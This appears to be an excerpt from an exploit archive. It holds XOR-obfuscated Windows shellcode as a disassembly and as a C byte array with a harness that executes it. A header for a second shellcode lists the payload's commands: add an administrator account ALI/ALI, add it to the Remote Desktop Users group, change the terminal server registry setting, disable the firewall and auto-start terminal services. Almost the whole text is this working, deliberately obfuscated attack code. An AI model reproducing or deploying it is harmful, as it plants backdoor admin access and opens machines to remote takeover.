d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx
|
||||
d6: ba 70 4b 70 51 mov $0x51704b70,%edx
|
||||
db: 31 d1 xor %edx,%ecx
|
||||
dd: 51 push %ecx
|
||||
de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx
|
||||
e3: ba 51 45 51 2d mov $0x2d514551,%edx
|
||||
e8: 31 d1 xor %edx,%ecx
|
||||
ea: 51 push %ecx
|
||||
eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx
|
||||
f0: ba 4d 39 68 39 mov $0x3968394d,%edx
|
||||
f5: 31 d1 xor %edx,%ecx
|
||||
f7: 51 push %ecx
|
||||
f8: 89 e0 mov %esp,%eax
|
||||
fa: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
ff: c1 eb 08 shr $0x8,%ebx
|
||||
102: c1 eb 08 shr $0x8,%ebx
|
||||
105: c1 eb 08 shr $0x8,%ebx
|
||||
108: 53 push %ebx
|
||||
109: 50 push %eax
|
||||
10a: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
|
||||
10f: ba 33 52 64 59 mov $0x59645233,%edx
|
||||
114: 31 d3 xor %edx,%ebx
|
||||
116: ff d3 call *%ebx
|
||||
118: 31 c0 xor %eax,%eax
|
||||
11a: 50 push %eax
|
||||
11b: 68 41 41 64 64 push $0x64644141
|
||||
120: 58 pop %eax
|
||||
121: c1 e8 08 shr $0x8,%eax
|
||||
124: c1 e8 08 shr $0x8,%eax
|
||||
127: 50 push %eax
|
||||
128: b9 02 63 6b 35 mov $0x356b6302,%ecx
|
||||
12d: ba 4b 43 44 54 mov $0x5444434b,%edx
|
||||
132: 31 d1 xor %edx,%ecx
|
||||
134: 51 push %ecx
|
||||
135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx
|
||||
13a: ba 43 75 2d 71 mov $0x712d7543,%edx
|
||||
13f: 31 d1 xor %edx,%ecx
|
||||
141: 51 push %ecx
|
||||
142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx
|
||||
147: ba 54 5a 49 69 mov $0x69495a54,%edx
|
||||
14c: 31 d1 xor %edx,%ecx
|
||||
14e: 51 push %ecx
|
||||
14f: b9 25 34 12 67 mov $0x67123425,%ecx
|
||||
154: ba 4a 44 32 32 mov $0x3232444a,%edx
|
||||
159: 31 d1 xor %edx,%ecx
|
||||
15b: 51 push %ecx
|
||||
15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx
|
||||
161: ba 6e 71 74 6d mov $0x6d74716e,%edx
|
||||
166: 31 d1 xor %edx,%ecx
|
||||
168: 51 push %ecx
|
||||
169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx
|
||||
16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx
|
||||
173: 31 d1 xor %edx,%ecx
|
||||
175: 51 push %ecx
|
||||
176: b9 35 15 03 2a mov $0x2a031535,%ecx
|
||||
17b: ba 67 70 6e 45 mov $0x456e7067,%edx
|
||||
180: 31 d1 xor %edx,%ecx
|
||||
182: 51 push %ecx
|
||||
183: b9 3a 17 75 46 mov $0x4675173a,%ecx
|
||||
188: ba 6f 47 55 64 mov $0x6455476f,%edx
|
||||
18d: 31 d1 xor %edx,%ecx
|
||||
18f: 51 push %ecx
|
||||
190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx
|
||||
195: ba 6a 72 59 51 mov $0x5159726a,%edx
|
||||
19a: 31 d1 xor %edx,%ecx
|
||||
19c: 51 push %ecx
|
||||
19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx
|
||||
1a2: ba 66 65 45 6b mov $0x6b456566,%edx
|
||||
1a7: 31 d1 xor %edx,%ecx
|
||||
1a9: 51 push %ecx
|
||||
1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx
|
||||
1af: ba 53 65 61 7a mov $0x7a616553,%edx
|
||||
1b4: 31 d1 xor %edx,%ecx
|
||||
1b6: 51 push %ecx
|
||||
1b7: 89 e0 mov %esp,%eax
|
||||
1b9: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
1be: c1 eb 08 shr $0x8,%ebx
|
||||
1c1: c1 eb 08 shr $0x8,%ebx
|
||||
1c4: c1 eb 08 shr $0x8,%ebx
|
||||
1c7: 53 push %ebx
|
||||
1c8: 50 push %eax
|
||||
1c9: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
|
||||
1ce: ba 33 52 64 59 mov $0x59645233,%edx
|
||||
1d3: 31 d3 xor %edx,%ebx
|
||||
1d5: ff d3 call *%ebx
|
||||
1d7: 31 c0 xor %eax,%eax
|
||||
1d9: 50 push %eax
|
||||
1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx
|
||||
1df: ba 38 6c 53 38 mov $0x38536c38,%edx
|
||||
1e4: 31 d1 xor %edx,%ecx
|
||||
1e6: 51 push %ecx
|
||||
1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx
|
||||
1ec: ba 62 62 5d 34 mov $0x345d6262,%edx
|
||||
1f1: 31 d1 xor %edx,%ecx
|
||||
1f3: 51 push %ecx
|
||||
1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx
|
||||
1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx
|
||||
1fe: 31 d1 xor %edx,%ecx
|
||||
200: 51 push %ecx
|
||||
201: b9 1d 30 15 28 mov $0x2815301d,%ecx
|
||||
206: ba 58 77 4a 6c mov $0x6c4a7758,%edx
|
||||
20b: 31 d1 xor %edx,%ecx
|
||||
20d: 51 push %ecx
|
||||
20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx
|
||||
213: ba 53 5b 77 44 mov $0x44775b53,%edx
|
||||
218: 31 d1 xor %edx,%ecx
|
||||
21a: 51 push %ecx
|
||||
21b: b9 42 25 2a 66 mov $0x662a2542,%ecx
|
||||
220: ba 2d 4b 59 46 mov $0x46594b2d,%edx
|
||||
225: 31 d1 xor %edx,%ecx
|
||||
227: 51 push %ecx
|
||||
228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx
|
||||
22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx
|
||||
232: 31 d1 xor %edx,%ecx
|
||||
234: 51 push %ecx
|
||||
235: b9 20 2b 26 26 mov $0x26262b20,%ecx
|
||||
23a: ba 63 44 48 48 mov $0x48484463,%edx
|
||||
23f: 31 d1 xor %edx,%ecx
|
||||
241: 51 push %ecx
|
||||
242: b9 08 2b 23 67 mov $0x67232b08,%ecx
|
||||
247: ba 66 52 77 34 mov $0x34775266,%edx
|
||||
24c: 31 d1 xor %edx,%ecx
|
||||
24e: 51 push %ecx
|
||||
24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx
|
||||
254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx
|
||||
259: 31 d1 xor %edx,%ecx
|
||||
25b: 51 push %ecx
|
||||
25c: b9 67 67 1d 37 mov $0x371d6767,%ecx
|
||||
261: ba 45 47 32 41 mov $0x41324745,%edx
|
||||
266: 31 d1 xor %edx,%ecx
|
||||
268: 51 push %ecx
|
||||
269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx
|
||||
26e: ba 71 45 68 49 mov $0x49684571,%edx
|
||||
273: 31 d1 xor %edx,%ecx
|
||||
275: 51 push %ecx
|
||||
276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx
|
||||
27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx
|
||||
280: 31 d1 xor %edx,%ecx
|
||||
282: 51 push %ecx
|
||||
283: b9 37 44 1f 2e mov $0x2e1f4437,%ecx
|
||||
288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx
|
||||
28d: 31 d1 xor %edx,%ecx
|
||||
28f: 51 push %ecx
|
||||
290: b9 34 23 23 3b mov $0x3b232334,%ecx
|
||||
295: ba 68 77 46 49 mov $0x49467768,%edx
|
||||
29a: 31 d1 xor %edx,%ecx
|
||||
29c: 51 push %ecx
|
||||
29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx
|
||||
2a2: ba 73 48 65 78 mov $0x78654873,%edx
|
||||
2a7: 31 d1 xor %edx,%ecx
|
||||
2a9: 51 push %ecx
|
||||
2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx
|
||||
2af: ba 48 6d 37 3d mov $0x3d376d48,%edx
|
||||
2b4: 31 d1 xor %edx,%ecx
|
||||
2b6: 51 push %ecx
|
||||
2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx
|
||||
2bc: ba 52 6e 43 46 mov $0x46436e52,%edx
|
||||
2c1: 31 d1 xor %edx,%ecx
|
||||
2c3: 51 push %ecx
|
||||
2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx
|
||||
2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx
|
||||
2ce: 31 d1 xor %edx,%ecx
|
||||
2d0: 51 push %ecx
|
||||
2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx
|
||||
2d6: ba 58 7a 44 44 mov $0x44447a58,%edx
|
||||
2db: 31 d1 xor %edx,%ecx
|
||||
2dd: 51 push %ecx
|
||||
2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx
|
||||
2e3: ba 49 62 78 52 mov $0x52786249,%edx
|
||||
2e8: 31 d1 xor %edx,%ecx
|
||||
2ea: 51 push %ecx
|
||||
2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx
|
||||
2f0: ba 61 31 67 75 mov $0x75673161,%edx
|
||||
2f5: 31 d1 xor %edx,%ecx
|
||||
2f7: 51 push %ecx
|
||||
2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx
|
||||
2fd: ba 62 64 68 73 mov $0x73686462,%edx
|
||||
302: 31 d1 xor %edx,%ecx
|
||||
304: 51 push %ecx
|
||||
305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx
|
||||
30a: ba 36 33 78 69 mov $0x69783336,%edx
|
||||
30f: 31 d1 xor %edx,%ecx
|
||||
311: 51 push %ecx
|
||||
312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx
|
||||
317: ba 31 52 4c 67 mov $0x674c5231,%edx
|
||||
31c: 31 d1 xor %edx,%ecx
|
||||
31e: 51 push %ecx
|
||||
31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx
|
||||
324: ba 58 49 79 72 mov $0x72794958,%edx
|
||||
329: 31 d1 xor %edx,%ecx
|
||||
32b: 51 push %ecx
|
||||
32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx
|
||||
331: ba 2d 65 52 6e mov $0x6e52652d,%edx
|
||||
336: 31 d1 xor %edx,%ecx
|
||||
338: 51 push %ecx
|
||||
339: b9 16 10 1f 17 mov $0x171f1016,%ecx
|
||||
33e: ba 34 58 54 52 mov $0x52545834,%edx
|
||||
343: 31 d1 xor %edx,%ecx
|
||||
345: 51 push %ecx
|
||||
346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx
|
||||
34b: ba 4e 43 68 4e mov $0x4e68434e,%edx
|
||||
350: 31 d1 xor %edx,%ecx
|
||||
352: 51 push %ecx
|
||||
353: b9 39 22 5e 50 mov $0x505e2239,%ecx
|
||||
358: ba 4b 47 39 70 mov $0x7039474b,%edx
|
||||
35d: 31 d1 xor %edx,%ecx
|
||||
35f: 51 push %ecx
|
||||
360: 89 e0 mov %esp,%eax
|
||||
362: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
367: c1 eb 08 shr $0x8,%ebx
|
||||
36a: c1 eb 08 shr $0x8,%ebx
|
||||
36d: c1 eb 08 shr $0x8,%ebx
|
||||
370: 53 push %ebx
|
||||
371: 50 push %eax
|
||||
372: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
|
||||
377: ba 33 52 64 59 mov $0x59645233,%edx
|
||||
37c: 31 d3 xor %edx,%ebx
|
||||
37e: ff d3 call *%ebx
|
||||
380: 31 c0 xor %eax,%eax
|
||||
382: 50 push %eax
|
||||
383: b8 41 41 41 65 mov $0x65414141,%eax
|
||||
388: c1 e8 08 shr $0x8,%eax
|
||||
38b: c1 e8 08 shr $0x8,%eax
|
||||
38e: c1 e8 08 shr $0x8,%eax
|
||||
391: 50 push %eax
|
||||
392: b9 1e 53 39 3c mov $0x3c39531e,%ecx
|
||||
397: ba 6d 32 5b 50 mov $0x505b326d,%edx
|
||||
39c: 31 d1 xor %edx,%ecx
|
||||
39e: 51 push %ecx
|
||||
39f: b9 04 66 2f 32 mov $0x322f6604,%ecx
|
||||
3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx
|
||||
3a9: 31 d1 xor %edx,%ecx
|
||||
3ab: 51 push %ecx
|
||||
3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx
|
||||
3b1: ba 69 73 62 75 mov $0x75627369,%edx
|
||||
3b6: 31 d1 xor %edx,%ecx
|
||||
3b8: 51 push %ecx
|
||||
3b9: b9 20 41 47 36 mov $0x36474120,%ecx
|
||||
3be: ba 45 35 67 59 mov $0x59673545,%edx
|
||||
3c3: 31 d1 xor %edx,%ecx
|
||||
3c5: 51 push %ecx
|
||||
3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx
|
||||
3cb: ba 47 69 44 59 mov $0x59446947,%edx
|
||||
3d0: 31 d1 xor %edx,%ecx
|
||||
3d2: 51 push %ecx
|
||||
3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx
|
||||
3d8: ba 62 5a 38 43 mov $0x43385a62,%edx
|
||||
3dd: 31 d1 xor %edx,%ecx
|
||||
3df: 51 push %ecx
|
||||
3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx
|
||||
3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx
|
||||
3ea: 31 d1 xor %edx,%ecx
|
||||
3ec: 51 push %ecx
|
||||
3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx
|
||||
3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx
|
||||
3f7: 31 d1 xor %edx,%ecx
|
||||
3f9: 51 push %ecx
|
||||
3fa: 89 e0 mov %esp,%eax
|
||||
3fc: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
401: c1 eb 08 shr $0x8,%ebx
|
||||
404: c1 eb 08 shr $0x8,%ebx
|
||||
407: c1 eb 08 shr $0x8,%ebx
|
||||
40a: 53 push %ebx
|
||||
40b: 50 push %eax
|
||||
40c: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
|
||||
411: ba 33 52 64 59 mov $0x59645233,%edx
|
||||
416: 31 d3 xor %edx,%ebx
|
||||
418: ff d3 call *%ebx
|
||||
41a: 31 c0 xor %eax,%eax
|
||||
41c: 50 push %eax
|
||||
41d: b8 41 41 41 6f mov $0x6f414141,%eax
|
||||
422: c1 e8 08 shr $0x8,%eax
|
||||
425: c1 e8 08 shr $0x8,%eax
|
||||
428: c1 e8 08 shr $0x8,%eax
|
||||
42b: 50 push %eax
|
||||
42c: b9 72 2a 05 39 mov $0x39052a72,%ecx
|
||||
431: ba 52 4b 70 4d mov $0x4d704b52,%edx
|
||||
436: 31 d1 xor %edx,%ecx
|
||||
438: 51 push %ecx
|
||||
439: b9 54 3a 05 52 mov $0x52053a54,%ecx
|
||||
43e: ba 35 48 71 6f mov $0x6f714835,%edx
|
||||
443: 31 d1 xor %edx,%ecx
|
||||
445: 51 push %ecx
|
||||
446: b9 29 16 0a 47 mov $0x470a1629,%ecx
|
||||
44b: ba 4c 36 79 33 mov $0x3379364c,%edx
|
||||
450: 31 d1 xor %edx,%ecx
|
||||
452: 51 push %ecx
|
||||
453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx
|
||||
458: ba 55 6d 32 5d mov $0x5d326d55,%edx
|
||||
45d: 31 d1 xor %edx,%ecx
|
||||
45f: 51 push %ecx
|
||||
460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx
|
||||
465: ba 41 77 48 75 mov $0x75487741,%edx
|
||||
46a: 31 d1 xor %edx,%ecx
|
||||
46c: 51 push %ecx
|
||||
46d: b9 34 79 3a 12 mov $0x123a7934,%ecx
|
||||
472: ba 53 59 4e 77 mov $0x774e5953,%edx
|
||||
477: 31 d1 xor %edx,%ecx
|
||||
479: 51 push %ecx
|
||||
47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx
|
||||
47f: ba 72 32 78 41 mov $0x41783272,%edx
|
||||
484: 31 d1 xor %edx,%ecx
|
||||
486: 51 push %ecx
|
||||
487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx
|
||||
48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx
|
||||
491: 31 d1 xor %edx,%ecx
|
||||
493: 51 push %ecx
|
||||
494: 89 e0 mov %esp,%eax
|
||||
496: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
49b: c1 eb 08 shr $0x8,%ebx
|
||||
49e: c1 eb 08 shr $0x8,%ebx
|
||||
4a1: c1 eb 08 shr $0x8,%ebx
|
||||
4a4: 53 push %ebx
|
||||
4a5: 50 push %eax
|
||||
4a6: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
|
||||
4ab: ba 33 52 64 59 mov $0x59645233,%edx
|
||||
4b0: 31 d3 xor %edx,%ebx
|
||||
4b2: ff d3 call *%ebx
|
||||
4b4: bb f9 7e 5e 22 mov $0x225e7ef9,%ebx
|
||||
4b9: ba 36 54 3d 54 mov $0x543d5436,%edx
|
||||
4be: 31 d3 xor %edx,%ebx
|
||||
4c0: ff d3 call *%ebx
|
||||
|
||||
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
|
||||
int main(){
|
||||
unsigned char shellcode[]= "\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba
\x62\x62\x5d\x34\x31\xd1\x51\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9
\x2a\x6f\x2a\x24\xba\x42\x4f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\xbb\xf9\x7e\x5e\x22\xba\x36\x54\x3d\x54\x31\xd3\xff\xd3";
|
||||
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
|
||||
(*(void(*)()) shellcode)();
|
||||
}
|
440
platforms/win64/shellcode/35794.txt
Executable file
440
platforms/win64/shellcode/35794.txt
Executable file
|
@ -0,0 +1,440 @@
|
|||
#Author: Ali Razmjoo
|
||||
? ?#Title: ?Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
|
||||
|
||||
Obfuscated Shellcode Windows x64 [1218 Bytes].c
|
||||
|
||||
/*
|
||||
#Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
|
||||
#length: 1218 bytes
|
||||
#Date: 13 January 2015
|
||||
#Author: Ali Razmjoo
|
||||
#tested On: Windows 7 x64 ultimate
|
||||
|
||||
WinExec => 0x769e2c91
|
||||
ExitProcess => 0x769679f8
|
||||
====================================
|
||||
Execute :
|
||||
net user ALI ALI /add
|
||||
net localgroup Administrators ALI /add
|
||||
NET LOCALGROUP "Remote Desktop Users" ALI /add
|
||||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
|
||||
netsh firewall set opmode disable
|
||||
sc config termservice start= auto
|
||||
====================================
|
||||
|
||||
|
||||
|
||||
Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']
|
||||
|
||||
Thanks to my friends , Dariush Nasirpour and Ehsan Nezami
|
||||
|
||||
|
||||
C:\Users\Ali\Desktop>objdump -D shellcode.o
|
||||
|
||||
shellcode.o: file format elf32-i386
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
00000000 <.text>:
|
||||
0: 31 c0 xor %eax,%eax
|
||||
2: 50 push %eax
|
||||
3: b8 41 41 41 64 mov $0x64414141,%eax
|
||||
8: c1 e8 08 shr $0x8,%eax
|
||||
b: c1 e8 08 shr $0x8,%eax
|
||||
e: c1 e8 08 shr $0x8,%eax
|
||||
11: 50 push %eax
|
||||
12: b9 6d 76 53 52 mov $0x5253766d,%ecx
|
||||
17: ba 4d 59 32 36 mov $0x3632594d,%edx
|
||||
1c: 31 d1 xor %edx,%ecx
|
||||
1e: 51 push %ecx
|
||||
1f: b9 6e 72 61 71 mov $0x7161726e,%ecx
|
||||
24: ba 4e 33 2d 38 mov $0x382d334e,%edx
|
||||
29: 31 d1 xor %edx,%ecx
|
||||
2b: 51 push %ecx
|
||||
2c: b9 6c 75 78 78 mov $0x7878756c,%ecx
|
||||
31: ba 4c 34 34 31 mov $0x3134344c,%edx
|
||||
36: 31 d1 xor %edx,%ecx
|
||||
38: 51 push %ecx
|
||||
39: b9 46 47 57 46 mov $0x46574746,%ecx
|
||||
3e: ba 33 34 32 34 mov $0x34323433,%edx
|
||||
43: 31 d1 xor %edx,%ecx
|
||||
45: 51 push %ecx
|
||||
46: b9 56 50 47 64 mov $0x64475056,%ecx
|
||||
4b: ba 38 35 33 44 mov $0x44333538,%edx
|
||||
50: 31 d1 xor %edx,%ecx
|
||||
52: 51 push %ecx
|
||||
53: 89 e0 mov %esp,%eax
|
||||
55: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
5a: c1 eb 08 shr $0x8,%ebx
|
||||
5d: c1 eb 08 shr $0x8,%ebx
|
||||
60: c1 eb 08 shr $0x8,%ebx
|
||||
63: 53 push %ebx
|
||||
64: 50 push %eax
|
||||
65: bb dc 7a a8 23 mov $0x23a87adc,%ebx
|
||||
6a: ba 4d 56 36 55 mov $0x5536564d,%edx
|
||||
6f: 31 d3 xor %edx,%ebx
|
||||
71: ff d3 call *%ebx
|
||||
73: 31 c0 xor %eax,%eax
|
||||
75: 50 push %eax
|
||||
